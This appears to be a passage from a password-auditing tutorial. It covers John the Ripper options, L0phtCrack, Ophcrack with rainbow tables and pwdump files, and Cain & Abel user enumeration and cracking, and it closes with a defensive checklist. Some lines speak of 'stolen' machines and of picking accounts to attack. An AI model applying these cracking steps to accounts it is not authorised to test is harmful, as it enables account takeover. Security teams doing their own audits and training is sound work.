Notice that for this test, we've added a user account with an easily crackable password; for demonstration purposes. This also greatly reduced the time for us that it took to guess the password via cracking.
Figure 1.0 Demonstrating a successfully cracked password (baseball)
From this example, we can clearly see that the account of "sportsfan" was breached using a password guess of "baseball." This example shows a few demonstrations. Of those demonstrations; we can see that the account "sportsfan" must be related to sports; common guessing would have told us that. However, What does the second set of information tell us? It goes on to tell us that password security measures for this company were not in place adequately.
Furthermore, this demonstrates how organizations can also utilize this information to test their own security. Before we actually wrap this up; let's discuss the syntax which was used during this security test. The john -salts:-2 tells john to utilize less than 2 salts. This will speed up the cracking of the passwd file as it does not load salts. The more salts you load; the longer the duration of the cracking cycle you will undergo. -wordfile:wordlst.log is a massive collection of passwords. One thing I MUST mention is that, as you begin your venture into security make a word file after you crack password files. If commonly utilized passwords can then be reused for faster cracking later on! Finally, we attempt to crack shadow which is the file we acquired from the target.
L0pht is a great utility for auditing password strengths. With that said, so is OPHCrack. In order for us to understand how we should run L0pht let us follow the next set of diagrams Figure 1.0 – 1.4 will walk you through the initial setup.
Figure 1.0 Auditing a local password DB
(Stolen box, or one you have access to)
When auditing in this fashion it's best to have sniffed the traffic from the box, and take the sniffed traffic and apply the attack. This process can take quite some time and if you do not have a temporarily “stolen” computer, you will most likely be up in the office for hours or days at a time. This is not something inconspicuous.
Figure 1.1 Selected as a strong audit.
Figure 1.2 With all options checked.
L0phtCrack cracking passwords
OphCrack is another VERY Powerful cracking application which also uses rainbow tables for quick factorization. However, the installation may provide you with some challenges. Just a word to the wise; make sure you download and install the rainbow tables if asked to do so! This will cut back on cracking later on in the game of password cracking. When you first start Ophcrack you must select which method you will be cracking. Single, pwdump, etc? Once you've decided which pieces of information you've obtained, make a selection and begin cracking. The figure below demonstrates loading a pwdump2 file:
Figure 1.0 Detailing to select “PWDUMP” File
When the information has been successfully loaded, you should click on the tables icon at the top. The next figure demonstrates how to load tables, and utilize them Remember: When dealing with this information, you should assure you have enough of space to load the table into memory. This will make cracking much faster than accessing the disk.
Figure 1.1 Click on “Tables” for the password / rainbow tables.
In the tables menu, if the information is not installed (red marker) you must highlight, and click "install" When the information is loaded, you can select those tables installed. The next figure 1.2 demonstrates this:
Figure 1.2 Displaying the tables and which to install.
When you've successfully installed all the rainbow tables, your next stop should be to crack the information. The images below show cracking with and without tables (you can see without tables, as there are not ables loaded or scanned on the bottom portion of the graphic).
Once everything has been set click on the “Crack” option to begin cracking.
Displaying the characters which belong to the password.
A finished run with out tables and no passwords found!
Loaded tables with accounts, and passwords found (even demonstrating accounts with single character passwords found -- but need to be brute forced more).
Cracking with Cain & Abel is straight forward. When you load C&A Click on the "Network" Tab, and drill down to users, as shown here:
Dumping the listing of users and starting user enumeration.
When you are asked to start user enumeration, as the image above has shown; accept and say "Yes." This will start a users enumeration, and who you the next section as shown here:
Displaying the enumerated users listing and readying the information for cracking.
Now that the users list has been shown, it's time to begin cracking the users to see exactly what accounts are easiest to launch and stage attacks against. Remember, any accounts which you can gain access to, may provide you with access you did not have before! So, any accounts is a blessing at this point. Click on the "Cracker" at the top ans as shown here:
Showing the listing of users, and accounts to crack.
When this screen appears right-click any of the accounts in which you would like to crack, and make a selection. When you right click you sill see a menu as shown here:
The next screen will be shown, it shall be known that you must select the "Options," options and the cracking files you would like to work with. Once this has been accomplished; the cracking will start as shown here:
Passwords that are broken will be displayed in the cain main menu, as shown with the users.
In some organizations, and this can range from the SOHO/SMB and all the way up, passwords are not on the fore-front of the defensive listing. I have worked in organizations where the passwords were anything from the owners name, to the business name shortened with a two digit number affixed to the ending of the password. This can also range from words found in a dictionary, to passwords such as: p@55w0rd. For more information on password security, please see the countermeasures section.
Password auditing can enable a corporation to understand what types of passwords are being used, and the strength. Again, there are ways in forcing users to use stronger passwords, but this comes with a bad cost (writing passwords down, using sticky notes, etc). It may seem that those malicious hackers and their tools need to beat it and get lost. Well, the truth of the matter is; if you want to defend against a hacker, you need to see your network security through the mind and eyes of a hacker.
The password tools that we've utilized (john, linnt, pwdump2, wireshark, tcpdump, and especially l0pth crack – just to name a few) have their benefits. And although some of the tools like wireshark / ethereal, and tcpdump aren't password auditing tools, they can all aid in the help of testing whether or not your passwords are secure.
Routing and passing these tools off as just “malicious tools that we don't want in our environment” will inadvertently place your organization at a serious risk. Again, you need to maintain upkeep and assure that your environment is safe! In order to do this, we've assembled a little check list to help you with the most when it comes to password security. Using the listing below, and the information in the previous modules you can assure that your company is on the ball with password security. In this sector, we will pick a tool that will test each stage of password security:
|
Credentials traversing a network connection:
Form Field Credentials (Also Testing Users Attentiveness to Security)
Password Auditing:
|
Password auditing can also help an environment in determining which sectors they need to place their efforts. Whether it be tighter security practices when selecting software, network connections which perform encryption (CHAP, RADIUS, SSH, sFTP, etc) and finally understanding where the issues may lay within password security for users.
As per on the box password auditing LC will work the best; and provide you with the overall view of how well the passwords were implemented.